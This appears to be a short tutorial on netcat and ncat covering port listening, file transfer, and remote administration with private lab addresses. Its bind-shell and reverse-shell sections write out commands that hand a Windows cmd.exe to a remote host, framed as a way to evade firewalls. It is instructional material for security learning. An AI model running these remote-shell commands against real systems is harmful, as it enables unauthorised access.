Netcat======**Netcat** known as a *Swiss Army Knfe* that can read and write to

1. Netcat
2. ======
3. **Netcat** known as a *Swiss Army Knfe* that can read and write to TCP and UDP
4. ports.This tools can handle the following functionalities.
5.  
6. 1. Connecting/Listening to a TCP/UDP Port.
7. 2. File Transfer.
8. 3. Remote Administration.
9.  
10. ### Connecting/Listening to a TCP/UDP Port
11. Netcat can be use as both server and client listening to a given port.A good
12. example of this is a simple chat application.
13.  
14. Server: A server listening to port 3333 from any incoming connection
15. ```shell
16. $ nc -lvp 3333
17. listening on [any] 3333 ...
18. ```
19.  
20. Client: Connecting to The server on port 3333
21. ```shell
22. $ nc 192.168.100.24 3333
23. ```
24.  
25. Once we are connected anything we type from the console will be shown
26. to the server console.
27.  
28. ### File Transfer
29. Netcat can be used to transfer files from one host to another. This is effective
30. for small size since no information is provided while transfering the file.
31.  
32. Server: `exploit.exe` our file transfered.
33. ```shell
34. $ nc -vlp 3333 > exploit.exe
35. ```
36.  
37. Client: transfer file to above server.
38. ```shell
39. $ nc 192.168.100.14 < exploit.exe
40. ```
41.  
42. ### Remote Administration
43. Netcat can also be used to do command redirection for administration such as.
44.  
45. + Netcat Bind Shell
46. + Netcat Reverse Shell
47.  
48. ###### Netcat Bind Shell
49. Netcat can be used to bind a shell to a specific port so a remote host can
50. connect to it. Example:
51.  
52. Windows: As our server and will bind the `cmd.exe` to port 3333
53. ```shell
54. C:\Windows>nc -lvp 3333 -e cmd.exe
55. ```
56.  
57. Linux: As our client to connect to port 3333
58. ```shell
59. $ nc 192.168.100.14 3333
60. Microsoft Windows XP [Version 5.1.2600]
61. (C) Copyright 1985-2001 Microsoft Corp.
62.  
63. C:\Windows>ipconfig
64. ipconfig
65.  
66. Windows IP Configuration
67.  
68.  
69. Ethernet adapter Local Area Connection:
70.  
71. Connection-specific DNS Suffix . :
72. IP Address. . . . . . . . . . . . : 10.0.2.15
73. Subnet Mask . . . . . . . . . . . : 255.255.255.0
74. Default Gateway . . . . . . . . . : 10.0.2.2
75.  
76. Ethernet adapter Local Area Connection 3:
77.  
78. Connection-specific DNS Suffix . :
79. IP Address. . . . . . . . . . . . : 192.168.100.14
80. Subnet Mask . . . . . . . . . . . : 255.255.255.0
81. Default Gateway . . . . . . . . . : 192.168.100.1
82.  
83. Ethernet adapter Local Area Connection 2:
84.  
85. Connection-specific DNS Suffix . :
86. IP Address. . . . . . . . . . . . : 192.168.56.74
87. Subnet Mask . . . . . . . . . . . : 255.255.255.0
88. Default Gateway . . . . . . . . . : 192.168.56.64
89.  
90. C:\Windows>
91. ```
92. ###### Bind Reverse Shell
93. It's similar to Bind Shell the only difference is that it sends command shell to a
94. listening host.This feature is useful when you want to evade firewall.
95.  
96. Linux: listening host on port 3333
97. ```shell
98. $ nc -lvp 3333
99. listening on [any] 3333 ...
100. ```
101.  
102. Windows: Connect to a listening host and send it command shells.
103. ```shell
104. C:\Windows>nc 192.168.100.6 3333 -e cmd.exe
105. ```
106.  
107. Ncat
108. ====
109. Ncat is a more improved version of `netcat` that support
110. encryption,authentication and allow a specific host to connect to.
111.  
112. ```shell
113. $ ncat -vlp 3333 --allow 192.168.100.6 --ssl
114. ```
115. Above command create an encrypted session using ssl and only allow host
116. 192.168.100.6 to connect to it.